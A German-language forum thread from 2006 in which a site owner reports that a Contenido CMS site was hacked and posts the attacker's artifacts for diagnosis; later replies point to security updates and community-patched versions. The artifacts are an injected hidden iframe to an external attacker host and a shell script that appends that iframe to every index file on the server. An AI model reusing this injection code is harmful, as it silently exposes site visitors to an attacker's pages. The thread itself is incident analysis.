Version 4.4.5 gehackt

Uwe · Beitrag von **Uwe** » Do 8. Jun 2006, 13:34

Hallo,

eine Kundenseite von mir wurde gehackt, der Provider sagt, dass es über Contenido geschehen ist. Das glaube ich aber nicht. Dennoch poste ich das mal und würde gerne Eure Meinung dazu hören.

Wenn Ihr denkt, dieser code wäre schädlich, dann entfernt ihn bitte, will ja keinen auf dumme Gedanken bringen

Folgendes ist geschehen:
index.php (da habe ich einen include(front_content.php) drin) wurde verändert

Code: Alles auswählen

<?php
include("front_content.php");
?><html><iframe src=http://www.o00o.info/portal/index.php?aff=eduardo width=0 Sheight=0 frameborder=0 Sscrolling=no></iframe></html>

Die Datei class.inuse.php -> Name auf class.inuses.php geändert.

Eine Textdatei auf Backendroot angelegt (6.txt) mit diesem Inhalt:

Code: Alles auswählen

#!/bin/sh
#codado por int3rc3pt0r
echo "Coded by int3rc3pt0r"
echo "Modificando no diretorio: $1"
echo "Iniciando o mass.sh"
echo "Modificando as index.html"
for i in `find $1/ -name index.php`
do
	echo "<html><iframe src=http://www.o00o.info/portal/index.php?aff=eduardo width=0 Sheight=0 frameborder=0 Sscrolling=no></iframe></html>" >> $i
done
echo "Modificando as index.htm"
echo ""
for i in `find $1/ -name index.html`
do
		echo "<html><iframe src=http://www.o00o.info/portal/index.php?aff=eduardo width=0 Sheight=0 frameborder=0 Sscrolling=no></iframe></html>" >> $i	
done
echo "Modificando as index.php"
echo ""
for i in `find $1/ -name index.htm`
do
		echo "<html><iframe src=http://www.o00o.info/portal/index.php?aff=eduardo width=0 Sheight=0 frameborder=0 Sscrolling=no></iframe></html>" >> $i	
done
echo "Mass Concluido"

Der Verfasser muss recht aktiv sein, wenn ich seinen "Namen" bei google eingebe, kommen ne Menge Treffer ...

Viele Grüsse aus Konstanz, Uwe

Beitrag von **HerrB** » Do 8. Jun 2006, 13:43

Ähm, doch, sicher, das liegt an Contenido. Deswegen gibt es auch ein V4.4.6-Update: http://www.contenido.org/forum/viewtopic.php?t=10737

Gruß
HerrB

Uwe · Beitrag von **Uwe** » Do 8. Jun 2006, 14:50

Iss ja n Ding ... KK-Antrag umsonst gestellt. Naja, der neue Provider ist eh der Bessere - und billiger

Und so mach ich gleich ein Update auf 4.6.8, die con_actionlog ist ja schon drin. Da war doch ach mal irgendwas ...

Was ist überhaupt passiert? Oder wie konnte das passieren? Hat der Jenige gezielt nach dieser Contenido-Version gesucht? Im Netz hat er wohl schon viele Seiten auf dem Gewissen - aber doch wohl nicht alle mit Contenido ..

Viele Grüsse, Uwe

rezeptionist · Beitrag von **rezeptionist** » Do 8. Jun 2006, 15:22

wenn du die 4.6.8 benutzen willst bitte die Version aus meiner Signatur benutzen (sind einige fixes schon drin)

Spart dir einiges an Arbeit

mvf · Beitrag von **mvf** » Do 8. Jun 2006, 15:28

rezeptionist hat geschrieben:wenn du die 4.6.8 benutzen willst bitte die Version aus meiner Signatur benutzen (sind einige fixes schon drin) Spart dir einiges an Arbeit

ich finde es echt toll rezeptionist mit welcher beharrlichkeit du auf dein klasse werk (merci an dieser stelle nochmal) hinweist, aber es ist wiklich schade dass die suche anscheinend immernoch so wenig genutzt wird, denn jeder der nur ein wenig mit-/quer-liest sollte schon x-mal über deine version gesolpert sein

Uwe · Beitrag von **Uwe** » Do 8. Jun 2006, 15:51

Auch ich finde es super!

Ich weiss nicht warum, aber ich nehme immer die Version von der Contenido-Seite. Da habe ich das Gefühl, das die Hand & Fuss ("zertifiziert") hat und aktuell ist. Deswegen suche ich auch nicht nach anderen Versionen. Diese sehe ich immer als eine Arbeits-und Testversion für die Entwickler an, die die Änderungen (wenn gut) in die offizielle Version einfliessen lassen.

Wie ist das denn nun, gibt es da einen Versionsmischmasch? Gibt es eine Möglichkeit von 4fb aktuelle Versionen freizugeben? Versionsnummern kann man ja nach hinten einbauen (z. B. 4.6.8.4).

@rezeptionist
Ist Deine Version stabil und getestet? Ich weiss, keine Garantie, aber die gibts von keinem.

Viele Grüsse vom Bodensee, Uwe

mvf · Beitrag von **mvf** » Do 8. Jun 2006, 16:02

Uwe hat geschrieben:Wie ist das denn nun, gibt es da einen Versionsmischmasch? Gibt es eine Möglichkeit von 4fb aktuelle Versionen freizugeben? Versionsnummern kann man ja nach hinten einbauen (z. B. 4.6.8.4).

@rezeptionist
Ist Deine Version stabil und getestet? Ich weiss, keine Garantie, aber die gibts von keinem.

Viele Grüsse vom Bodensee, Uwe

nomralerweise schon von contenido.org, korrekt! (oder eine MR version von stese)

allerdings gibt es anscheinend engpässe (threads gibts dazu auch) bei 4fb und daher hat sich rezeptionist die mühe gemacht bugfixes ind eine 4.6.8.X einfliessen zu lassen

rezeptionist · Beitrag von **rezeptionist** » Do 8. Jun 2006, 16:42

@Uwe
bei 1000 Downlads kaum Probleme ! Sind ja nur die wichtigsten Fixes drin damit es "Out of the Box" läuft.

@mvf
ich weise bei solchen Aussagen darauf hin da man gleich die andere Version nimmt da ansonsten eh wieder Fragen kommen würden, und die wären dann wieder unnütz